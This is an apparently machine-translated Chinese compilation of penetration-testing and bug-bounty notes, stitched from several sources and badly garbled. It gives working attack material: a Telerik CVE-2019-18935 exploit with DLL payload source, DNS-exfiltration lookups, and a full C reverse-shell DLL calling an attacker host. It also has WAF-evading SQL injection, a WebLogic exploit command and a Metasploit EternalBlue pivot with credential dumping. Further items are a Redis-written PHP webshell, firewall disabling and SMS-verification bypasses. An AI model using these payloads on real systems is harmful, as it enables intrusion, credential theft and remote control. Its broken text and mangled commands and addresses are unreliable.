.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
いくつかの抜け穴が最近掘られました。繰り返されていますが、参照値があります。ここであなたと共有させてください。
抜け穴を繰り返すことはまだ非常に不快です。あなたがそれについて考えるとき、人生は決して満足のいくものではありません。抜け穴を繰り返すことは、失敗を意味するものではありません。最初に来てから来ることが重要であり、外観の順序が重要です。
1.特定のサイトRCEは、ドメイン名:https://***。*** :8089/をテストするために私を連れて行ってくれた司祭に感謝しているスコープ著者の司祭に感謝しない理由を無視します。
CVE-2017-11357 CVE-2019-18935 CVE-2017-9248脆弱性が存在します
脆弱性エクスプロイトダウンロードアドレス:
https://github.com/noperator/cve-2019-18935
https://github.com/noperator/cve-2019-18935.git
遅延11S:SLOIP 11S:
テストコード:テスト
#windows.hを含めます
#include stdio.h
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
if(fdwreason==dll_process_attach)
//スリープ(10000); //数百万秒単位の時間間隔。
睡眠(11000);
trueを返します。
}
test.cはAMD642.dllファイル
にコンパイルします
:python CVE -2019-18935.py -v 2017.1.228 -p Payloads \ amd642.dll -u https://**** :8089/telerik.web.ui.webresource.axd?Type=rau
最初のステップは正常に確認することです。成功遅延は約11秒、元のリクエストは2秒です
テストコマンド実行:
#windows.hを含む
#include stdio.h
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
if(fdwreason==dll_process_attach)
system( 'cmd.exe /c nslookup rsmwe.dnslog.cn');
System( 'cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net');
trueを返します。
} test.c AMD642.dllファイルにコンパイル
もう一度実行してDNSLOG:を表示します
直接リバウンドシェル、一般exp:
#winsock2.hを含む
#include stdio.h
#include windows.h
#pragmaコメント(lib、 'ws2_32')
#define host '{vps ip}'
#define port {port}
wsadata wsadata;
ソケットウィンソック;
ソケットソック;
struct sockaddr_in hax;
char aip_addr [16];
startupinfo ini_processo;
process_information processo_info;
//https://github.com/infoskirmish/window-tools/blob/master/simple%20reverse%20shell/shell.cからの適応
void reverseshell()
{
wsastartup(makeword(2、2)、wsadata);
winsock=wsasocket(af_inet、sock_stream、ipproto_tcp、null、0、0);
struct HOSTENT *host=gethostbyname(host);
strcpy(aip_addr、inet_ntoa( *((struct in_addr *)host-h_addr)));
hax.sin_family=af_inet;
hax.sin_port=htons(port);
hax.sin_addr.s_addr=inet_addr(aip_addr);
wsaconnect(winsock、(sockaddr*)hax、sizeof(hax)、null、null、null、null、null);
if(wsagetlasterror()==0){
memset(ini_processo、0、sizeof(ini_processo));
ini_processo.cb=sizeof(ini_processo);
ini_processo.dwflags=startf_usestdhandles;
ini_processo.hstdinput=ini_processo.hstdoutput=ini_processo.hstderror=(handle)winsock;
char *myArray [4]={'cm'、 'd.e'、 'x'、 'e'};
charコマンド[8]='';
snprintf(command、sizeof(command)、 '%s%s%s'、myarray [0]、myarray [1]、myarray [2]、myarray [3]);
createProcess(null、command、null、null、true、0、null、null、ini_processo、processo_info);
}
}
dword winapi mainthread(lpvoid lpparam)
{
Reverseshell();
0を返します。
}
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
hthreadを処理します。
if(fdwreason==dll_process_attach)
hthread=createThread(0、0、mainthread、0、0、0);
trueを返します。
} 
許可は低くありません、それはドメインユーザー:です
2。SQL注入:背景紹介:友人が注射を送った。この注入は非常に難しいです。 XXクラウドのWAFがあり、バックエンドフィルターのコンマ、奇数と二重引用符、および通常の機能があります。私のアイデアは非常にシンプルで、16進数です。 regexp機能だけで、他のアイデアがあるべきだと思います。
(Case+When+Current_user+regexp+0x*+then+1+else+2*1e308+end)この方法では、データベースユーザーが作成されます。
ここで、声明の場合のケースについてお話したいと思います。声明が私たちが想像したよりもはるかに柔軟である場合。ここでメモを取り、について話します
最も一般的な:
異常なことを言って、私は2つのデモを書きます、そして私はそれを続け続けることができます:
2=2の場合、ケース1=1次に1=1 else 1/0 end
3.urlジャンプ +アイデンティティ認証トークンリーク:昨夜それを掘りました、そして、私が無視する理由は複製です。時々、私は一部のメーカーに非常に言葉を失い、脆弱性はそこにあり、彼らは修正されていません。それは私に幻想を与え、抜け穴を見つけ、ハニーポットを踏むという幻想を持っていました。資産範囲は:VC-*。xxx.comです
実際、私は簡単なファズを作ることができ、多くの資産を見つけたので、私はこの範囲に遭遇してとてもうれしいです。
1つずつ開いて視聴し、VC-Ss.xxx.comにアクセスしてサイトにアクセスし、直接ジャンプしてログインを求めます。
私は神ではなく、説明もありません。私はJSを見て、PATH情報へのアクセスが見つかりませんでした。
ファズから始めて、PHPであることがわかっている場合は簡単です。 FFUFを使用してPHP/API辞書を実行し、インターフェイス開発ドキュメント/API /***.htmlに実行します
インターフェイス開発ドキュメントの当初の意図は良好ですが、ほとんどのインターフェイス開発ドキュメントに関するスクリーンショット情報/インターフェイス情報は、二次脆弱性の搾取のリスクがある可能性があります。残念ながらテスト後、スクリーンショット情報はすべてプレーンテキストですが、ほとんどすべてのインターフェイスが401に直接アクセスできることがわかり、ID認証が必要であることがわかりました。私は少し無力でした。私があきらめたかったとき、私はいつも自分自身に読んだ後に慎重に読むように自分自身に言いました。私はインターフェイスドキュメントを見つめ続け、めくっていて、アイデンティティトークンリークやその他のセキュリティの脆弱性を見つけました。
私は抜け穴を提出し、朝:に重複したメッセージを受け取りました
オリジナルリンク:https://www.cnblogs.com/piaomiaohongchen/p/17130283.html
にリバウンドシェルが表示されます
CURL -S https://9BOOTSTRAP.PYPA.IO/GET-PIP.PY | Python3
Service Docker Start
2。バックグラウンドログインをバイパス1。許可の脆弱性をバイパスすると、主要なPOCは次のとおりです。
python3 CVE-2020-14882_all.py -U3http://45.77.248.22733607001/-C 'LS'
図1:分散展開
図2:シングルホストアーキテクチャ
次の図は、各チャネルのイベントの数を示しています。フィルタリングエージェント
ディスプレイエージェント
であることがわかります
の存続ホストをスキャンしている生存ホスト:192.168.127.91ポートをスキャンして、生き残ったターゲットマシンのIPアドレスをスキャンします
ターゲットシステムがWin7であり、445ポートが開いていることを発見しました。 Eternal Blue(MS17-010)を使用してターゲットシステム
MeterPreterShellc: \ Windows \ System32IpConfig 
私はいくつかの文字化けコードを見つけたので、C: \ Windows \ System32CHCP 65001#65001#65001#65001#65001#65001#65001 c: \ windows \ system32ipconfig#iは2つのネットワークセグメントを見つけました。1つは192.168.127ネットワークセグメント、もう1つは10.0.20ネットワークセグメント
C: \ Windows \ System32Whomai 
C: \ windows \ system32tasklist/svc#view#view system in system 
c3: \ windows \ system32exit #exit shellコマンド末端
meterleterloadoload loadoload loadoload loadoload load load load loadoload MeterPreterCreds_All#すべての現在のユーザーのログイン資格情報をゲットし、ユーザー名がWin7であり、パスワードは管理者
Tongdaの検索11.3既存のファイルには検索エンジンを介した脆弱性が含まれています:https://blog.csdn.net/hackzkaq/article/details/details/details/details/details/details/details/details/details/details/details/details/details/details/details/details/details/details/details/11590000 
Ant Sword 
を使用して正常に接続すると、Ant Swordのコマンドターミナルの下で現在のユーザーをシステム許可に表示する許可は、
ADDダイナミックルートメータープレーターはAutoroute -S 10.0.20.0/24またはMeterPreter BackgroundMeterPreter Sessionsmsf6 Exploit(Windows/SMB/MS17_010_ETERNALBLUE)を使用します。 1MSF6 Exploit(Windows/SMB/MS17_010_ETERNALBLUE)RUN 
METERPRETERバックグラウンド
生き残ったホストMSF6エクスポロイトを発見(Windows/SMB/MS17_010_ETERNALBLUE) Exploit(Windows/SMB/MS17_010_ETERNALBLUE)セッションセッション1MSF6 Exploit(Windows/SMB/MS17_010_ETERNALBLUE)SET RHOSTS 10.0.20.1-254MSF6 Exploit(Windows/SMB/MS17_010_ETERNALBLUE)RUN 
Survive host.20.9 SOCKS5 Proxy MSF6 Exploit(Windows/SMB/MS17_010_ETERNALBLUE)使用補助/サーバー/SOCKS_PROXYMSF6 AUXILIARY(SERVER/SOCKS_PROXY)
ポートスカンシングを修正する必要があります。構成ファイル
は、10.0.20.99のホストがポート6379および80に開かれていることを発見しました。ここには、ローカルソックス5プロキシサービスプロキシアソフトウェア
がDirsearchをスキャンし、ターゲットがPHPINFO.PHPセンシティページを持っていることを発見しました。 200,302 - Format CSV -O C: \ Users \ backlion \ Desktop \ dirsearch-master \ xxx.com.csvまたは攻撃機の下でプロキシチェインを実行するか、kali python dirsearch.py -u http://10.0.0.20.99 -i -Proxy=Socks5: //127.0.0.1:1080 -T 5 
PHPINFO.PHPページにアクセスして、ウェブサイトの絶対パスが公開されていることを確認してください:C:/PHPSTUDY/PHPTUORIAL/WWW/333333333810.0.0.PHPT.0.PHPT.0.0.PHPTURE 
010-10 Redis-Cli Command Proxychains Redis-Cli -H 10.0.20.99を介したパスワードなしのリモート接続'c:/phpstudy/phptutorial/www/' #switchシェル10.0.20.20.99:606379セットx '\ n \ n \ n?php @eval($ _ post [' x ']); 10.0.20.99:6379 Config set dbfileName shell.php#ファイル名をshell.php10.0.0.20.993:6379 Save 
ここに、地元のホストのAnt Swordを介したプロキシです。
View現在のユーザーの許可はシステム
を実行して、リスナーを構成します
Firewall netsh firewalsetopmodemode=disable 010-69556 run shell.exe in the Antable同じネットワークセグメントホストMeterPreter ARP 
スキャン10.0.10.110ネットワークセグメント移行プロセスRun Post/Windows/Manage/Migrate
上記の写真では、管理アカウントが正常に列挙され、ターゲットマシンのSSHがHydraを介して爆破されていることがわかります。
です
に変更されます
に注意してください
を追加します
元のテキスト接続:https://Blog.bbskali.cn/3771.html
HPF(HTTPパラメーターセグメンテーション):この方法は、CRLFと同様のHTTPセグメンテーションインジェクションです(コントロール文字0A、%0Dなどを使用します。
%ASP/ASP.NETは影響を受けます
にのみ適用されます
国内のDNS再帰を捕まえた上位レベルのDNSサーバーは、360、Tencent、およびALIでした。このようなノードDNSサーバーがあれば、間違いなく恥ずかしがり屋のウェブサイトをたくさん手に入れるでしょう。私はそれについて考えることに少し興奮していました▽≤sqlServerは次の方法を使用できます
を構成します
として、テイクアウトデータのドメイン名のrainism.cc用ドメイン名サーバーを構成します
参照https://MP.weixin.Q.com/s/s/hmgeyrcf1HSVW995501
で聴くポートを入力します
Configuration
awesomescriptenginefactory.javaコードの一部
post /env http /1.1
POST /更新HTTP /1.1
ROOT@kali:/var/www/html#ls/tmp/suck*
。
2。可変汚染は、いわゆる可変汚染をバイパスします。おそらく、背景が最初の変数のコンテンツをチェックし、値として扱われますが、データパケットが背景に渡されると、パラメーター名が同じ場合、2番目、3番目、4番目、および最後のパラメーターがベンチマークとして渡されるため、バックエンドの制限は:0101
3に渡されます。携帯電話番号をバイパスするデータ長の定義は11桁ですが、背景は、123=0123=00123などの送信された携帯電話番号の長さを確認しません。この方法は、携帯電話番号をバイパスするために使用されます。確認コードを送信するとき、フロントエンドは状態をもたらします。この状態を変更することにより、システムの制限をバイパスできます。たとえば、登録されたユーザーはテキストメッセージを送信することはできません。反対に、未登録のユーザーはテキストメッセージを送信できません。フレーズはTrue 
5に変更されます。クッキーは、薬を変えないようにスープを迂回して置き換えます。 Cookieのユーザーの資格情報を確認します。 Cookieのいくつかのパラメーターを変更することにより、バイパスをバイパスして携帯電話番号を送信/登録してテキストメッセージを送信できます:
6。 [SPASTバイパスSMS爆撃] [画像なし] SMSを送信するときは11桁ですが、データベースはフィールドの長さを11に制限しません。元の検証はスペースを追加することでバイパスされます。ただし、バックグラウンドで番号を送信すると、有効な文字の前のフィールドが取得されるため、バイパスされた方法が得られます。 7。 8。[APIインターフェイスに基づいて] [写真なし]この脆弱性については、一般に、フロントデスクに携帯電話番号を入力し、リクエスト1を送信して背景に移動して、送信要求を実行できるかどうかを判断します。
を設定します
に正常にログインしたことを意味します
になります
